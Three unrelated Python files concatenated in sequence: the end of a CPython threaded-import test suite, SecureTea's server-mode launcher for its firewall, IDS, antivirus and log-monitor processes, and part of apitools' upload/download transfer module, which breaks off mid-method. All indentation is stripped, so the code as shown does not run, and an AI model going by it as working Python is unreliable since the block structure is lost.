dbg_info = 'done: %s/%s' % (len(done_tasks), N)
self.assertFalse(errors, dbg_info)
self.assertTrue(completed, dbg_info)
if verbose:
print("OK.")
def test_parallel_module_init(self):
self.check_parallel_module_init()
def test_parallel_meta_path(self):
finder = Finder()
sys.meta_path.insert(0, finder)
try:
self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(finder)
def test_parallel_path_hooks(self):
# Here the Finder instance is only used to check concurrent calls
# to path_hook().
finder = Finder()
# In order for our path hook to be called at each import, we need
# to flush the path_importer_cache, which we do by registering a
# dedicated meta_path entry.
flushing_finder = FlushingFinder()
def path_hook(path):
finder.find_spec('')
raise ImportError
sys.path_hooks.insert(0, path_hook)
sys.meta_path.append(flushing_finder)
try:
# Flush the cache a first time
flushing_finder.find_spec('')
numtests = self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(flushing_finder)
sys.path_hooks.remove(path_hook)
def test_import_hangers(self):
# In case this test is run again, make sure the helper module
# gets loaded from scratch again.
try:
del sys.modules['test.test_importlib.threaded_import_hangers']
except KeyError:
pass
import test.test_importlib.threaded_import_hangers
self.assertFalse(test.test_importlib.threaded_import_hangers.errors)
def test_circular_imports(self):
# The goal of this test is to exercise implementations of the import
# lock which use a per-module lock, rather than a global lock.
# In these implementations, there is a possible deadlock with
# circular imports, for example:
# - thread 1 imports A (grabbing the lock for A) which imports B
# - thread 2 imports B (grabbing the lock for B) which imports A
# Such implementations should be able to detect such situations and
# resolve them one way or the other, without freezing.
# NOTE: our test constructs a slightly less trivial import cycle,
# in order to better stress the deadlock avoidance mechanism.
delay = 0.5
os.mkdir(TESTFN)
self.addCleanup(shutil.rmtree, TESTFN)
sys.path.insert(0, TESTFN)
self.addCleanup(sys.path.remove, TESTFN)
for name, contents in circular_imports_modules.items():
contents = contents % {'delay': delay}
with open(os.path.join(TESTFN, name + ".py"), "wb") as f:
f.write(contents.encode('utf-8'))
self.addCleanup(forget, name)
importlib.invalidate_caches()
results = []
def import_ab():
import A
results.append(getattr(A, 'x', None))
def import_ba():
import B
results.append(getattr(B, 'x', None))
t1 = threading.Thread(target=import_ab)
t2 = threading.Thread(target=import_ba)
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(set(results), {'a', 'b'})
@mock_register_at_fork
def test_side_effect_import(self, mock_os):
code = """if 1:
import threading
def target():
import random
t = threading.Thread(target=target)
t.start()
t.join()
t = None"""
sys.path.insert(0, os.curdir)
self.addCleanup(sys.path.remove, os.curdir)
filename = TESTFN + ".py"
with open(filename, "wb") as f:
f.write(code.encode('utf-8'))
self.addCleanup(unlink, filename)
self.addCleanup(forget, TESTFN)
self.addCleanup(rmtree, '__pycache__')
importlib.invalidate_caches()
__import__(TESTFN)
del sys.modules[TESTFN]
@threading_helper.reap_threads
def test_main():
old_switchinterval = None
try:
old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-5)
except AttributeError:
pass
try:
run_unittest(ThreadedImportTests)
finally:
if old_switchinterval is not None:
sys.setswitchinterval(old_switchinterval)
if __name__ == "__main__":
test_main()
|
server_mode.py
|
# -*- coding: utf-8 -*-
u"""Server Mode for SecureTea.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Author: Abhishek Sharma <abhishek_official@hotmail.com> , Jul 28 2019
Version: 1.5.1
Module: SecureTea
"""
# Import all the modules necessary for server mode
from securetea.lib.ids import secureTeaIDS
from securetea.lib.log_monitor.system_log import engine
from securetea.lib.log_monitor.server_log.secureTeaServerLog import SecureTeaServerLog
from securetea.lib.auto_server_patcher.secureTeaServerPatcher import SecureTeaAutoServerPatcher
from securetea.lib.web_deface.secureTeaWebDeface import WebDeface
from securetea.lib.antivirus.secureTeaAntiVirus import SecureTeaAntiVirus
from securetea.lib.firewall import secureTeaFirewall
from securetea import logger
import multiprocessing
import sys
class ServerMode(object):
"""ServerMode class."""
def __init__(self, debug=False, cred=None):
"""
Initialize ServerMode.
Args:
debug (bool): Log on terminal or not
cred (dict): Configuration credentials
Raises:
None
Returns:
None
"""
self.debug = debug
# Initialize logger
self.logger = logger.SecureTeaLogger(
__name__,
debug=self.debug
)
# Initialize credentials
if cred is not None:
self.cred = cred
else:
self.logger.log(
"No configuraton parameters found, exiting",
logtype="error"
)
sys.exit(0)
# Initialize objects presence as false
self.firewall = False
self.ids = False
self.antivirus = False
self.auto_server_patcher = False
self.web_deface = False
self.server_log = False
self.system_log = False
# Initialize empty process pool list
self.process_pool = list()
def create_objects(self):
"""
Create module (Firewall, IDS, AntiVirus,
Auto Server Patcher, Web Deface) objects if
configuration parameters are available for them.
Args:
None
Raises:
None
Returns:
None
"""
if self.cred.get("firewall"):
try:
self.logger.log(
"Initializing Firewall object",
logtype="info"
)
# Initialize Firewall object
self.firewallObj = secureTeaFirewall.SecureTeaFirewall(cred=self.cred,
debug=self.debug)
self.firewall = True
self.logger.log(
"Initialized Firewall object",
logtype="info"
)
except KeyError:
self.logger.log(
"Firewall configuration parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("ids"):
try:
self.logger.log(
"Initializing IDS object",
logtype="info"
)
# Initialize IDS object
self.ids_obj = secureTeaIDS.SecureTeaIDS(cred=self.cred['ids'],
debug=self.debug)
self.ids = True
self.logger.log(
"Initialized IDS object",
logtype="info"
)
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("auto_server_patcher"):
try:
self.logger.log(
"Initializing patcher object"
)
# Initialize Patcher object
self.patcher_obj = SecureTeaAutoServerPatcher(debug=self.debug,
cred=self.cred["auto_server_patcher"])
self.auto_server_patcher = True
self.logger.log(
"Initialized patcher object"
)
except KeyError:
self.logger.log(
"Auto server patcher parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("antivirus"):
try:
self.logger.log(
"Initializing AntiVirus object",
logtype="info"
)
# Initialize AntiVirus object
self.antivirus_obj = SecureTeaAntiVirus(debug=self.debug,
cred=self.cred["antivirus"])
self.antivirus = True
self.logger.log(
"Initialized AntiVirus object",
logtype="info"
)
except KeyError:
self.logger.log(
"AntiVirus parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
# Only the debug configuration is required for the System Log Monitor, hence create it directly
try:
self.logger.log(
"Initializing System Log Monitor object",
logtype="info"
)
# Initialize SystemLogEngine object
self.system_log_obj = engine.SystemLogEngine(debug=self.debug)
self.system_log = True
self.logger.log(
"Initialized System Log Monitor object",
logtype="info"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("web_deface"):
try:
self.logger.log(
"Initializing Web Deface object",
logtype="info"
)
# Initialize WebDeface object
self.web_deface_obj = WebDeface(debug=self.debug,
path=self.cred['web_deface']['path'],
server_name=self.cred['web_deface']['server-name'])
self.web_deface = True
self.logger.log(
"Initialized Web Deface object",
logtype="info"
)
except KeyError:
self.logger.log(
"Web Deface Detection parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("server_log"):
try:
self.logger.log(
"Initializing Server Log Monitor object",
logtype="info"
)
server_cred = self.cred['server_log']
# Initialize Server Log Monitor object
self.server_log_obj = SecureTeaServerLog(debug=self.debug,
log_type=server_cred['log-type'],
log_file=server_cred['log-file'],
window=server_cred['window'],
ip_list=server_cred['ip-list'],
status_code=server_cred['status-code'])
self.server_log = True
self.logger.log(
"Initialized Server Log Monitor object",
logtype="info"
)
except KeyError:
self.logger.log(
"Server Log parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def create_process(self):
"""
Create process for the initialized objects.
Args:
None
Raises:
None
Returns:
None
"""
if self.firewall: # if Firewall object is initialized
firewall_process = multiprocessing.Process(target=self.firewallObj.start_firewall)
self.process_pool.append(firewall_process)
if self.ids: # if IDS object is initialized
ids_process = multiprocessing.Process(target=self.ids_obj.start_ids)
self.process_pool.append(ids_process)
if self.auto_server_patcher: # if Auto Server Patcher is initialized
auto_server_patcher_process = multiprocessing.Process(target=self.patcher_obj.start)
self.process_pool.append(auto_server_patcher_process)
if self.antivirus: # if AntiVirus object is initialized
antivirus_process = multiprocessing.Process(target=self.antivirus_obj.start)
self.process_pool.append(antivirus_process)
if self.web_deface: # if Web Deface object is initialized
web_deface_process = multiprocessing.Process(target=self.web_deface_obj.start)
self.process_pool.append(web_deface_process)
if self.system_log: # if System Log Monitor object is initialized
system_log_process = multiprocessing.Process(target=self.system_log_obj.run)
self.process_pool.append(system_log_process)
if self.server_log: # if Server Log Monitor object is initialized
server_log_process = multiprocessing.Process(target=self.server_log_obj.run)
self.process_pool.append(server_log_process)
def start_process(self):
"""
Start all the process in the process pool
and terminate gracefully in Keyboard Interrupt.
Args:
None
Raises:
None
Returns:
None
"""
try:
for process in self.process_pool:
process.start()
for process in self.process_pool:
process.join()
except KeyboardInterrupt:
for process in self.process_pool:
process.terminate()
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def start_server_mode(self):
"""
Start SecureTea in server mode.
Args:
None
Raises:
None
Returns:
None
"""
# Create / initialize required objects
self.create_objects()
# Create process for the objects
self.create_process()
# Start the process
self.start_process()
|
transfer.py
|
#!/usr/bin/env python
#
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Upload and download support for apitools."""
from __future__ import print_function
import email.generator as email_generator
import email.mime.multipart as mime_multipart
import email.mime.nonmultipart as mime_nonmultipart
import io
import json
import mimetypes
import os
import threading
import six
from six.moves import http_client
from apitools.base.py import buffered_stream
from apitools.base.py import exceptions
from apitools.base.py import http_wrapper
from apitools.base.py import stream_slice
from apitools.base.py import util
__all__ = [
'Download',
'Upload',
'RESUMABLE_UPLOAD',
'SIMPLE_UPLOAD',
'DownloadProgressPrinter',
'DownloadCompletePrinter',
'UploadProgressPrinter',
'UploadCompletePrinter',
]
_RESUMABLE_UPLOAD_THRESHOLD = 5 << 20
SIMPLE_UPLOAD = 'simple'
RESUMABLE_UPLOAD = 'resumable'
def DownloadProgressPrinter(response, unused_download):
"""Print download progress based on response."""
if 'content-range' in response.info:
print('Received %s' % response.info['content-range'])
else:
print('Received %d bytes' % response.length)
def DownloadCompletePrinter(unused_response, unused_download):
"""Print information about a completed download."""
print('Download complete')
def UploadProgressPrinter(response, unused_upload):
"""Print upload progress based on response."""
print('Sent %s' % response.info['range'])
def UploadCompletePrinter(unused_response, unused_upload):
"""Print information about a completed upload."""
print('Upload complete')
class _Transfer(object):
"""Generic bits common to Uploads and Downloads."""
def __init__(self, stream, close_stream=False, chunksize=None,
auto_transfer=True, http=None, num_retries=5):
self.__bytes_http = None
self.__close_stream = close_stream
self.__http = http
self.__stream = stream
self.__url = None
self.__num_retries = 5
# Let the @property do validation
self.num_retries = num_retries
self.retry_func = (
http_wrapper.HandleExceptionsAndRebuildHttpConnections)
self.auto_transfer = auto_transfer
self.chunksize = chunksize or 1048576
def __repr__(self):
return str(self)
@property
def close_stream(self):
return self.__close_stream
@property
def http(self):
return self.__http
@property
def bytes_http(self):
return self.__bytes_http or self.http
@bytes_http.setter
def bytes_http(self, value):
self.__bytes_http = value
@property
def num_retries(self):
return self.__num_retries
@num_retries.setter
def num_retries(self, value):
util.Typecheck(value, six.integer_types)
if value < 0:
raise exceptions.InvalidDataError(
'Cannot have negative value for num_retries')
self.__num_retries = value
@property
def stream(self):
return self.__stream
@property
def url(self):
return self.__url
def _Initialize(self, http, url):
"""Initialize this download by setting self.http and self.url.
We want the user to be able to override self.http by having set
the value in the constructor; in that case, we ignore the provided
http.
Args:
http: An httplib2.Http instance or None.
url: The url for this transfer.
Returns:
None. Initializes self.
"""
self.EnsureUninitialized()
if self.http is None:
self.__http = http or http_wrapper.GetHttp()
self.__url = url
@property
def initialized(self):
return self.url is not None and self.http is not None
@property
def _type_name(self):
return type(self).__name__
def EnsureInitialized(self):
if not self.initialized:
raise exceptions.TransferInvalidError(
'Cannot use uninitialized %s', self._type_name)
def EnsureUninitialized(self):
if self.initialized:
raise exceptions.TransferInvalidError(
'Cannot re-initialize %s', self._type_name)
def __del__(self):
if self.__close_stream:
self.__stream.close()
def _ExecuteCallback(self, callback, response):
# TODO(craigcitro): Push these into a queue.
if callback is not None:
threading.Thread(target=callback, args=(response, self)).start()
class Download(_Transfer):
"""Data for a single download.
Public attributes:
chunksize: default chunksize to use for transfers.
"""
_ACCEPTABLE_STATUSES = set((
http_client.OK,
http_client.NO_CONTENT,
http_client.PARTIAL_CONTENT,
http_client.REQUESTED_RANGE_NOT_SATISFIABLE,
))
_REQUIRED_SERIALIZATION_KEYS = set((
'auto_transfer', 'progress', 'total_size', 'url'))
def __init__(self, stream, progress_callback=None, finish_callback=None,
**kwds):
total_size = kwds.pop('total_size', None)
super(Download, self).__init__(stream, **kwds)
self.__initial_response = None
self.__progress = 0
self.__total_size = total_size
self.__encoding = None
self.progress_callback = progress_callback
self.finish_callback = finish_callback
@property
def progress(self):
return self.__progress
@property
def encoding(self):
return self.__encoding
@classmethod
def FromFile(cls, filename, overwrite=False, auto_transfer=True, **kwds):
"""Create a new download object from a filename."""
path = os.path.expanduser(filename)
if os.path.exists(path) and not overwrite:
raise exceptions.InvalidUserInputError(
'File %s exists and overwrite not specified' % path)
return cls(open(path, 'wb'), close_stream=True,
auto_transfer=auto_transfer, **kwds)
@classmethod
def FromStream(cls, stream, auto_transfer=True, total_size=None, **kwds):
"""Create a new Download object from a stream."""
return cls(stream, auto_transfer=auto_transfer, total_size=total_size,
**kwds)
@classmethod
def FromData(cls, stream, json_data, http=None, auto_transfer=None,
**kwds):
"""Create a new Download object from a stream and serialized data."""
info = json.loads(json_data)
missing_keys = cls._REQUIRED_SERIALIZATION_KEYS - set(info.keys())
if missing_keys:
raise exceptions.InvalidDataError(
'Invalid serialization data, missing keys: %s' % (
', '.join(missing_keys)))
download = cls.FromStream(stream, **kwds)
if auto_transfer is not None:
download.auto_transfer = auto_transfer
else:
download.auto_transfer = info['auto_transfer']
setattr(download, '_Download__progress', info['progress'])
setattr(download, '_Download__total_size', info['total_size'])
download._Initialize( # pylint: disable=protected-access
http, info['url'])
return download
@property
def serialization_data(self):
self.EnsureInitialized()
return {
'auto_transfer': self.auto_transfer,
'progress': self.progress,
'total_size': self.total_size,
'url': self.url,
}
@property
def total_size(self):
return self.__total_size
def __str__(self):
if not self.initialized:
return 'Download (uninitialized)'
else:
return 'Download with %d/%s bytes transferred from url %s' % (
self.progress, self.total_size, self.url)
def ConfigureRequest(self, http_request, url_builder):
url_builder.query_params['alt'] = 'media'
# TODO(craigcitro): We need to send range requests because by
# default httplib2 stores entire responses in memory. Override
# httplib2's download method (as gsutil does) so that this is not
# necessary.
http_request.headers['Range'] = 'bytes=0-%d' % (self.chunksize - 1,)
def __SetTotal(self, info):
if 'content-range' in info:
_, _, total = info['content-range'].rpartition('/')
if total != '*':
self.__total_size = int(total)
# Note "total_size is None" means we don't know it; if no size
# info was returned on our initial range request, that means we
# have a 0-byte file. (That last statement has been verified
# empirically, but is not clearly documented anywhere.)
if self.total_size is None:
self.__total_size = 0
def InitializeDownload(self, http_request, http=None, client=None):
"""Initialize this download by making a request.
Args:
http_request: The HttpRequest to use to initialize this download.
http: The httplib2.Http instance for this request.
client: If provided, let this client process the final URL before
sending any additional requests. If client is provided and
http is not, client.http will be used instead.
"""
self.EnsureUninitialized()
if http is None and client is None:
raise exceptions.UserError('Must provide client or http.')
http = http or client.http
if client is not None:
http_request.url = client.FinalizeTransferUrl(http_request.url)
url = http_request.url
if self.auto_transfer:
end_byte = self.__ComputeEndByte(0)
self.__SetRangeHeader(http_request, 0, end_byte)
response = http_wrapper.MakeRequest(
self.bytes_http or http, http_request)
if response.status_code not in self._ACCEPTABLE_STATUSES:
raise exceptions.HttpError.FromResponse(response)
self.__initial_response = response
self.__SetTotal(response.info)
url = response.info.get('content-location', response.request_url)
if client is not None:
url = client.FinalizeTransferUrl(url)
self._Initialize(http, url)
# Unless the user has requested otherwise, we want to just
# go ahead and pump the bytes now.
if self.auto_transfer:
self.StreamInChunks()
def __NormalizeStartEnd(self, start, end=None):
if end is not None:
if start < 0:
raise exceptions.TransferInvalidError(
'Cannot have end index with negative start index')
elif start >= self.total_size:
raise exceptions.TransferInvalidError(
'Cannot have start index greater than total size')
end = min(end, self.total_size - 1)
if end < start:
raise exceptions.TransferInvalidError(
'Range requested with end[%s] < start[%s]' % (end, start))
return start, end
else:
if start < 0:
start = max(0, start + self.total_size)
return start, self.total_size - 1
def __SetRangeHeader(self, request, start, end=None):
if start < 0:
request.headers['range'] = 'bytes=%d' % start
elif end is None:
request.headers['range'] = 'bytes=%d-' % start
else:
request.headers['range'] = 'bytes=%d-%d' % (start, end)
def __ComputeEndByte(self, start, end=None, use_chunks=True):
"""Compute the last byte to fetch for this request.
This is all based on the HTTP spec for Range and
Content-Range.
Note that this is potentially confusing in several ways:
* the value for the last byte is 0-based, eg "fetch 10 bytes
from the beginning" would return 9 here.
* if we have no information about size, and don't want to
use the chunksize, we'll return None.
See the tests for more examples.
Args:
start: byte to start at.
end: (int or None, default: None) Suggested last byte.
use_chunks: (bool, default: True) If False, ignore self.chunksize.
Returns:
Last byte to use in a Range header, or None.
"""
end_byte = end
if start < 0 and not self.total_size:
return end_byte
if use_chunks:
alternate = start + self.chunksize - 1
if end_byte is not None:
end_byte = min(end_byte, alternate)
else:
end_byte = alternate
if self.total_size:
alternate = self.total_size - 1
if end_byte is not None:
end_byte = min(end_byte, alternate)
else:
end_byte = alternate
return end_byte
def __GetChunk(self, start, end, additional_headers=None):
"""Retrieve a chunk, and return the full response."""
self.EnsureInitialized()
request = http_wrapper.Request(url=self.url)
self.__SetRangeHeader(request, start, end=end)
if additional_headers is not None:
request.headers.update(additional_headers)
return http_wrapper.MakeRequest(
self.bytes_http, request, retry_func=self.retry_func,
retries=self.num_retries)
def __ProcessResponse(self, response):
"""Process response (by updating self and writing to self.stream)."""
if response.status_code not in self._ACCEPTABLE_STATUSES:
# We distinguish errors that mean we made a mistake in setting
# up the transfer versus something we should attempt again.
if response.status_code in (http_client.FORBIDDEN,
http_client.NOT_FOUND):
raise exceptions.HttpError.FromResponse(response)
else:
raise exceptions.TransferRetryError(response.content)
if response.status_code in (http_client.OK,
http_client.PARTIAL_CONTENT):
self.stream.write(response.content)
self.__progress += response.length
if response.info and 'content-encoding' in response.info:
# TODO(craigcitro): Handle the case where this changes over a
# download.
self.__encoding = response.info['content-encoding']
elif response.status_code == http_client.NO_CONTENT:
# It's important to write something to the stream for the case
# of a 0-byte download to a file, as otherwise python won't
# create the file.
self.stream.write('')
return response
def GetRange(self, start, end=None, additional_headers=None,
use_chunks=True):
"""Retrieve a given byte range from this download, inclusive.
Range must be of one of these three forms:
* 0 <= start, end = None: Fetch from start to the end of the file.
* 0 <= start <= end: Fetch the bytes from start to end.
* start < 0, end = None: Fetch the last -start bytes of the file.
(These variations correspond to those described in the HTTP 1.1
protocol for range headers in RFC 2616, sec. 14.35.1.)
Args:
start: (int) Where to start fetching bytes. (See above.)
end: (int, optional) Where to stop fetching bytes. (See above.)
additional_headers: (bool, optional) Any additional headers to
pass with the request.
use_chunks: (bool, default: True) If False, ignore self.chunksize
and fetch this range in a single request.
Returns:
None. Streams bytes into self.stream.
"""
self.EnsureInitialized()
progress_end_normalized = False
if self.total_size is not None:
progress, end_byte = self.__NormalizeStartEnd(start, end)
progress_end_normalized = True
else:
progress = start
end_byte = end
while (not progress_end_normalized or end_byte is None or
progress <= end_byte):
end_byte = self.__ComputeEndByte(progress, end=end_byte,
use_chunks=use_chunks)
response = self.__GetChunk(progress, end_byte,
additional_headers=additional_headers)
if not progress_end_normalized:
self.__SetTotal(response.info)
progress, end_byte = self.__NormalizeStartEnd(start, end)
progress_end_normalized = True
response = self.__ProcessResponse(response)
progress += response.length
if response.length == 0:
raise exceptions.TransferRetryError(
'Zero bytes unexpectedly returned in download response')
def StreamInChunks(self, callback=None, finish_callback=None,
additional_headers=None):
"""Stream the entire download in chunks."""
self.StreamMedia(callback=callback, finish_callback=finish_callback,
additional_headers=additional_headers,
use_chunks=True)
def StreamMedia(self, callback=None, finish_callback=None,
additional_headers=None, use_chunks=True):
"""Stream the entire download.
Args:
callback: (default: None) Callback to call as each chunk is
completed.
finish_callback: (default: None) Callback to call when the
download is complete.
additional_headers: (default: None) Additional headers to
include in fetching bytes.
use_chunks: (bool, default: True) If False, ignore self.chunksize
and stream this download in a single request.
Returns:
None. Streams bytes into self.stream.
"""
callback = callback or self.progress_callback
finish_callback = finish_callback or self.finish_callback
self.EnsureInitialized()
while True:
if self.__initial_response is not None:
response = self.__initial_response
self.__initial_response = None
else:
end_byte = self.__ComputeEndByte(self.progress,
use_chunks=use_chunks)
response = self.__GetChunk(
self.progress, end_byte,
additional_headers=additional_headers)
if self.total_size is None:
self.__SetTotal(response.info)
response = self.__ProcessResponse(response)
self._ExecuteCallback(callback, response)
if (response.status_code == http_client.OK or
self.progress >= self.total_size):
break
self._ExecuteCallback(finish_callback, response)
class Upload(_Transfer):
"""Data for a single Upload.
Fields:
stream: The stream to upload.
mime_type: MIME type of the upload.
total_size: (optional) Total upload size for the stream.
close_stream: (default: False) Whether or not we should close the
stream when finished with the upload.
auto_transfer: (default: True) If True, stream all bytes as soon as
the upload is created.
"""
_REQUIRED_SERIALIZATION_KEYS = set((
'auto_transfer', 'mime_type', 'total_size', 'url'))
def __init__(self, stream, mime_type, total_size=None, http=None,
close_stream=False, chunksize=None, auto_transfer=True,
progress_callback=None, finish_callback=None,
**kwds):
super(Upload, self).__init__(
stream, close_stream=close_stream, chunksize=chunksize,
auto_transfer=auto_transfer, http=http, **kwds)
self.__complete = False
self.__final_response = None
self.__mime_type = mime_type
self.__progress = 0
self.__server_chunk_granularity = None
self.__strategy = None
self.__total_size = None
self.progress_callback = progress_callback
self.finish_callback = finish_callback
self.total_size = total_size
@property
def progress(self):
return self.__progress
@classmethod
def FromFile(cls, filename, mime_type=None, auto_transfer=True, **kwds):
"""Create a new Upload object from a filename."""
path = os.path.expanduser(filename)
if not os.path.exists(path):
raise exceptions.NotFoundError('Could not find file %s' % path)
if not mime_type:
mime_type, _ = mimetypes.guess_type(path)
if mime_type is None:
raise exceptions.InvalidUserInputError(
'Could not guess mime type for %s' % path)
size = os.stat(path).st_size
return cls(open(path, 'rb'), mime_type, total_size=size,
close_stream=True, auto_transfer=auto_transfer, **kwds)
@classmethod
def FromStream(cls, stream, mime_type, total_size=None, auto_transfer=True,
**kwds):
"""Create a new Upload object from a stream."""
if mime_type is None:
raise exceptions.InvalidUserInputError(
'No mime_type specified for stream')
return cls(stream, mime_type, total_size=total_size,
close_stream=False, auto_transfer=auto_transfer, **kwds)
@classmethod
def FromData(cls, stream, json_data, http, auto_transfer=None, **kwds):
"""Create a new Upload of stream from serialized json_data and http."""
info = json.loads(json_data)
missing_keys = cls._REQUIRED_SERIALIZATION_KEYS - set(info.keys())
if missing_keys:
raise exceptions.InvalidDataError(
'Invalid serialization data, missing keys: %s' % (
', '.join(missing_keys)))
if 'total_size' in kwds:
raise exceptions.InvalidUserInputError(
'Cannot override total_size on serialized Upload')
upload = cls.FromStream(stream, info['mime_type'],
total_size=info.get('total_size'), **kwds)
if isinstance(stream, io.IOBase) and not stream.seekable():
raise exceptions.InvalidUserInputError(
'Cannot restart resumable upload on non-seekable stream')
if auto_transfer is not None:
upload.auto_transfer = auto_transfer
else:
upload.auto_transfer = info['auto_transfer']
upload.strategy = RESUMABLE_UPLOAD
upload._Initialize( # pylint: disable=protected-access
http, info['url'])
upload.RefreshResumableUploadState()
upload.EnsureInitialized()
if upload.auto_transfer:
upload.StreamInChunks()
return upload
@property
def serialization_data(self):
self.EnsureInitialized()
if self.strategy != RESUMABLE_UPLOAD:
raise exceptions.InvalidDataError(
'Serialization only supported for resumable uploads')
return {
'auto_transfer': self.auto_transfer,
'mime_type': self.mime_type,
'total_size': self.total_size,
'url': self.url,
}
@property
def complete(self):
return self.__complete
@property
def mime_type(self):
return self.__mime_type
def __str__(self):
if not self.initialized:
return 'Upload (uninitialized)'
else:
return 'Upload with %d/%s bytes transferred for url %s' % (
self.progress, self.total_size or '???', self.url)
@property
def strategy(self):
return self.__strategy
@strategy.setter
def strategy(self, value):
if value not in (SIMPLE_UPLOAD, RESUMABLE_UPLOAD):
raise exceptions.UserError((
'Invalid value "%s" for upload strategy, must be one of '
'"simple" or "resumable".') % value)
self.__strategy = value
@property
def total_size(self):
return self.__total_size
@total_size.setter
def total_size(self, value):
self.EnsureUninitialized()
self.__total_size = value
def __SetDefaultUploadStrategy(self, upload_config, http_request):
"""Determine and set the default upload strategy for this upload.
We generally prefer simple or multipart, unless we're forced to
use resumable. This happens when any of (1) the upload is too
large, (2) the simple endpoint doesn't support multipart requests
and we have metadata, or (3) there is no simple upload endpoint.
Args:
upload_config: Configuration for the upload endpoint.
http_request: The associated http request.
Returns:
None.
"""
if upload_config.resumable_path is None:
self.strategy = SIMPLE_UPLOAD
if self.strategy is not None:
return
strategy = SIMPLE_UPLOAD
if (self.total_size is not None and
self.total_size > _RESUMABLE_UPLOAD_THRESHOLD):
strategy = RESUMABLE_UPLOAD
if http_request.body and not upload_config.simple_multipart:
strategy = RESUMABLE_UPLOAD
if not upload_config.simple_path:
strategy = RESUMABLE_UPLOAD
self.strategy = strategy
def ConfigureRequest(self, upload_config, http_request, url_builder):
"""Configure the request and url for this upload."""
# Validate total_size vs. max_size
if (self.total_size and upload_config.max_size and
self.total_size > upload_config.max_size):
raise exceptions.InvalidUserInputError(
'Upload too big: %s larger than max size %s' % (
self.total_size, upload_config.max_size))
# Validate mime type
if not util.AcceptableMimeType(upload_config.accept, self.mime_type):
raise exceptions.InvalidUserInputError(
'MIME type %s does not match any accepted MIME ranges %s' % (
self.mime_type, upload_config.accept))
self.__SetDefaultUploadStrategy(upload_config, http_request)
if self.strategy == SIMPLE_UPLOAD:
url_builder.relative_path = upload_config.simple_path
if http_request.body:
url_builder.query_params['uploadType'] = 'multipart'
self.__ConfigureMultipartRequest(http_request)
else:
url_builder.query_params['uploadType'] = 'media'
self.__ConfigureMediaRequest(http_request)
else:
url_builder.relative_path = upload_config.resumable_path
url_builder.query_params['uploadType'] = 'resumable'
self.__ConfigureResumableRequest(http_request)
def __ConfigureMediaRequest(self, http_request):
"""Configure http_request as a simple request for this upload."""
http_request.headers['content-type'] = self.mime_type
http_request.body = self.stream.read()
http_request.loggable_body = '<media body>'
def __ConfigureMultipartRequest(self, http_request):
"""Configure http_request as a multipart request for this upload."""
# This is a multipart/related upload.
msg_root = mime_multipart.MIMEMultipart('related')
# msg_root should not write out its own headers
setattr(msg_root, '_write_headers', lambda self: None)
# attach the body as one part
msg = mime_nonmultipart.MIMENonMultipart(
*http_request.headers['content-type'].split('/'))
msg.set_payload(http_request.body)
msg_root.attach(msg)
# attach the media as the second part
msg = mime_nonmultipart.MIMENonMultipart(*self.mime_type.split('/'))
msg['Content-Transfer-Encoding'] = 'binary'
msg.set_payload(self.stream.read())
msg_root.attach(msg)
# NOTE: We encode the body, but can't use
# `email.message.Message.as_string` because it prepends
# `> ` to `From ` lines.
fp = six.BytesIO()
if six.PY3:
generator_class = email_generator.BytesGenerator
else:
generator_class = email_generator.Generator
g = generator_class(fp, mangle_from_=False)
g.flatten(msg_root, unixfrom=False)
http_request.body = fp.getvalue()
multipart_boundary = msg_root.get_boundary()
http_request.headers['content-type'] = (
'multipart/related; boundary=%r' % multipart_boundary)
if isinstance(multipart_boundary, six.text_type):
multipart_boundary = multipart_boundary.encode('ascii')
body_components = http_request.body.split(multipart_boundary)
headers, _, _ = body_components[-2].partition(b'\n\n')
body_components[-2] = b'\n\n'.join([headers, b'<media body>\n\n--'])
http_request.loggable_body = multipart_boundary.join(body_components)
def __ConfigureResumableRequest(self, http_request):
http_request.headers['X-Upload-Content-Type'] = self.mime_type
if self.total_size is not None:
http_request.headers[
'X-Upload-Content-Length'] = str(self.total_size)
def RefreshResumableUploadState(self):
"""Talk to the server and refresh the state of this resumable upload.
Returns:
Response if the upload is complete.
"""
if self.strategy != RESUMABLE_UPLOAD:
return
self.EnsureInitialized()
refresh_request = http_wrapper.Request(
url=self.url, http_method='PUT',
headers={'Content-Range': 'bytes */*'})
refresh_response = http_wrapper.MakeRequest(
self.http, refresh_request, redirections=0,
retries=self.num_retries)
range_header = self._GetRangeHeaderFromResponse(refresh_response)
if refresh_response.status_code in (http_client.OK,
http_client.CREATED):
self.__complete = True
self.__progress = self.total_size
self.stream.seek(self.progress)
# If we're finished, the refresh response will contain the metadata
# originally requested. Cache it so it can be returned in
# StreamInChunks.
self.__final_response = refresh_response
elif refresh_response.status_code == http_wrapper.RESUME_INCOMPLETE:
if range_header is None:
self.__progress = 0
else:
